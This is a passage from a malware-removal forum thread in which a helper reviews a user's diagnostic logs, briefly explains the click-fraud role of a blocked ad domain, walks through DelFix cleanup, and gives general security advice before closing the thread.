arguments "Unavailable" in order to run the server: {DD522ACC-F821-461A-A407-50B198B896DC} CodeIntegrity: =================================== Date: 2017-11-13 09:27:05.094 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-12 21:47:58.274 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-12 21:01:29.436 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-12 17:09:28.583 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-12 17:02:26.587 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-10 18:37:59.829 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-10 16:13:01.346 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-11-04 08:01:02.085 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-30 14:59:34.980 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-10-30 00:33:27.890 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz Percentage of memory in use: 21% Total physical RAM: 8108.94 MB Available physical RAM: 6359.21 MB Total Virtual: 16300.94 MB Available Virtual: 14711.77 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:919.74 GB) (Free:802.62 GB) NTFS Drive e: () (Removable) (Total:15.02 GB) (Free:15.02 GB) FAT32 Drive f: (Seagate Slim Drive) (Fixed) (Total:465.76 GB) (Free:454.05 GB) NTFS Drive g: (KINGSTON) (Removable) (Total:14.89 GB) (Free:13.24 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 931.5 GB) (Disk ID: 5641807B) Partition 1: (Not Active) - (Size=39 MB) - (Type=DE) Partition 2: (Active) - (Size=11.7 GB) - (Type=27) Partition 3: (Not Active) - (Size=919.7 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 465.8 GB) (Disk ID: 19D43B3F) Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS) ======================================================== Disk: 2 (MBR Code: Windows XP) (Size: 14.9 GB) (Disk ID: C3072E18) Partition 1: (Active) - (Size=14.9 GB) - (Type=0C) Could not read MBR for disk 3. ==================== End of Addition.txt ============================ Link to post Share on other sites More sharing options...
Charliew49 Posted November 14, 2017 Author ID:1182469 Share Posted November 14, 2017 Yoan, this seems to have worked. Is there any more checking that you need to do? Also, I am curious about n65adserv.com. What would have happened if this outbound file had not been blocked? Many thanks. Link to post Share on other sites More sharing options...
Aura Posted November 14, 2017 ID:1182485 Share Posted November 14, 2017 Your logs looks clean to me Quote Also, I am curious about n65adserv.com. What would have happened if this outbound file had not been blocked? Basically your system would be part of a clicking fraud campaign, helping generate revenue for cybercriminals. Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up. DelFix Follow the instructions below to download and execute DelFix. Download DelFix and move the executable to your Desktop Right-click on DelFix.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users) Check the following options :Activate UAC Remove disinfection tools Create registry backup Purge system restore Reset system settings Once all the options mentionned above are checked, click on Run After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply Tips, tricks, advice and recommendations Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you. Windows Updates Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically. How To Change Windows Update Settings How To Check For & Install Windows Updates Keeping your programs up-to-date Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days) which is one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like UCheck, SecuniaPSI and Heimdal Free will scan your system for outdated programs, and help you identify them, as well as update them. UCheck Documentation How to detect vulnerable and out-dated programs using Secunia Personal Software Inspector (PSI) Anti-Virus Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products). Sophos Home Bitdefender Free Antivirus Emsisoft Anti-Malware - Free 30 day trial. Once it expires, EAM enters into a freeware mode where it is still considered an Antivirus program, but without real-time protection Avira Free Antivirus avast! Free Antivirus Anti-Malware, Anti-Exploit and Anti-Ransomware Having a decent security setup (which also includes an Antivirus) is the most crucial step to protect a system. These programs are additional layers of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Fortunately, the new Malwarebytes 3 bundle all these layers in one, easy to use and efficient product. Malwarebytes 3 offers Malware, Web, Exploit and Ransomware protection modules that works together in order to keep your system protected and stop an infection at multiple level. Malwarebytes - Comes with a free trial of the Premium version for 14 days, after which it reverts back to the Free version Note: Please note that only the Premium version of Malwarebytes 3 offers real-time protection (Malware, Web, Exploit and Ransomware). The free version only allows you to scan your system for threats and remove them. Firewall Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below. GlassWire - Has both a free and paid version (with different packages) Windows Firewall Control - Gives you more control over your Windows Firewall TinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it Web Browsers and Web Browsing Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits. Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install. uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers) HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera) Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browsers) NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers) uMatrix: For advanced users, a point and click matrix-like extensions that allow you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera) LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser) As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few: The Ultimate Guide to Secure your Online Browsing: Chrome, Firefox and Internet Explorer on Heimdal Security Seven Useful Habits For A Safer Internet on Kapsersky Blog Tips for Secure Web Browsing: Cybersecurity 101 on VeraCode Safe browsing habits on Internet Safety Project Wiki As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them. Other recommendations Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far less chances to get infected by a malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you to avoid going to that website, downloading that file or using that program. Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices : Answers to common security questions - Best Practices by quietman7 How Malware Spreads - How did I get infected by quietman7 Simple and easy ways to keep your computer safe and secure on the Internet by Lawrence Abrams (aka Grinler) How to Prevent Malware by miekiemoes Tips & Advice on StaySafeOnline.org The End! And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you wont!), you can always comeback in this section to get another checkup with one of our trained malware removal member. Do you have any questions before I close this thread? Link to post Share on other sites More sharing options...
Charliew49 Posted November 14, 2017 Author ID:1182726 Share Posted November 14, 2017 Yoan, I never heard of click fraud before. Thanks for letting me know what it is. Yes, you can close this thread. Thank you again for all your help. Link to post Share on other sites More sharing options...
Aura Posted November 14, 2017 ID:1182740 Share Posted November 14, 2017 No problem Charliew, you're welcome! Stay safe Link to post Share on other sites More sharing options...
Aura Posted November 14, 2017 ID:1182741 Share Posted November 14, 2017 Glad we could help. :)If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.Other members who need assistance please start your own topic in a new thread. Thanks! Link to post Share on other sites More sharing options...
Recommended Posts